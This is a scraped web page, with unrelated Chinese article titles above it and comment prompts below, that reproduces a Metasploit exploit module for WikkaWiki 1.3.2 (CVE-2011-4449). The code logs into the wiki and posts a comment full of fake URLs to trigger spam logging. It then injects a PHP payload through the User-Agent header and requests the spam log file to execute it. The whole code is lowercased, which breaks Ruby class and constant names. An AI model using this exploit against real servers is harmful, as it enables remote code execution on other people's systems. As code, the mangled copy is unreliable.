辣椒酱的制作,新亚马逊历险记,五年四班抢银行
##
# this file is part of the metasploit framework and may be subject to
# redistribution and commercial restrictions. please see the metasploit
# framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class metasploit3 < msf::exploit::remote
rank = excellentranking
include msf::exploit::remote::httpclient
def initialize(info={})
super(update_info(info,
'name' => "wikkawiki 1.3.2 spam logging php injection",
'description' => %q{
this module exploits a vulnerability found in wikkawiki. when the spam logging
feature is enabled, it is possible to inject php code into the spam log file via the
useragent header , and then request it to execute our payload. there are at least
three different ways to trigger spam protection, this module does so by generating
10 fake urls in a comment (by default, the max_new_comment_urls parameter is 6).
please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'page'.
},
'license' => msf_license,
'author' =>
[
'egix', #initial discovery, poc
'sinn3r' #metasploit
],
'references' =>
[
['cve', '2011-4449'],
['osvdb', '77391'],
['edb', '18177'],
['url', 'http:// www.jb51.net /trac/wikka/ticket/1098']
],
'payload' =>
{
'badchars' => "\x00"
},
'defaultoptions' =>
{
'exitfunction' => "none"
},
'arch' => arch_php,
'platform' => ['php'],
'targets' =>
[
['wikkawiki 1.3.2 r1814', {}]
],
'privileged' => false,
'disclosuredate' => "nov 30 2011",
'defaulttarget' => 0))
register_options(
[
optstring.new('username', [true, 'wikkawiki username']),
optstring.new('password', [true, 'wikkawiki password']),
optstring.new('page', [true, 'page to inject']),
optstring.new('targeturi', [true, 'the uri path to wikkawiki', '/wikka/'])
], self.class)
end
def check
res = send_request_raw({
'method' => 'get',
'uri' => "#{target_uri.path}wikka.php?wakka=homepage"
})
if res and res.body =~ /powered by wikkawiki/
return exploit::checkcode::detected
else
return exploit::checkcode::safe
end
end
#
# get the cookie before we do any of that login/exploity stuff
#
def get_cookie
res = send_request_raw({
'method' => 'get',
'uri' => "#{@base}wikka.php"
})
# get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['set-cookie']
cookie = res.headers['set-cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise runtimeerror, "#{@peer} - no cookie found, will not continue"
end
cookie
end
#
# do login, and then return the cookie that contains our credential
#
def login(cookie)
# send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=usersettings"
res = send_request_raw({
'method' => 'get',
'uri' => uri,
'cookie' => cookie
})
# extract the hidden fields
login = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>login\/register\<\/legend\>/m
fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
login[name] = value
end
else
raise runtimeerror, "#{@peer} - unable to find the hidden fieldset required for login"
end
# add the rest of fields required for login
login['action'] = 'login'
login['name'] = datastore['username']
login['password'] = datastore['password']
login['do_redirect'] = 'on'
login['submit'] = "login"
login['confpassword'] = ''
login['email'] = ''
port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'post',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => login
})
if res and res.headers['set-cookie'] =~ /user_name/
user = res.headers['set-cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['set-cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['username']}:#{datastore['password']}"
raise runtimeerror, "#{@peer} - unable to login with \"#{cred}\""
end
return cookie_cred
end
#
# after login, we inject the php payload
#
def inject_exec(cookie)
# get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'get',
'uri' => "#{@base}wikka.php?wakka=#{datastore['page']}&show_comments=1",
'cookie' => cookie
})
fields = {}
if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise runtimeerror, "#{@peer} - cannot get necessary fields before posting a comment"
end
# generate enough urls to trigger spam logging
urls = ''
10.times do |i|
urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"
end
# add more fields
fields['body'] = urls
fields['submit'] = 'add'
# inject payload
b64_payload = rex::text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['page']}/addcomment"
post_data = ""
send_request_cgi({
'method' => 'post',
'uri' => "#{@base}wikka.php?wakka=#{datastore['page']}/addcomment",
'cookie' => cookie,
'headers' => { 'referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"
})
send_request_raw({
'method' => 'get',
'uri' => "#{@base}spamlog.txt.php"
})
end
def exploit
@peer = "#{rhost}:#{rport}"
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - getting cookie")
cookie = get_cookie
print_status("#{@peer} - logging in")
cred = login(cookie)
print_status("#{@peer} - triggering spam logging")
inject_exec(cred)
handler
end
end
=begin
for testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka
open wikka.config.php, do:
'spam_logging' => '1'
=end
如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!!
点击进行留言回复
我要评论
网友评论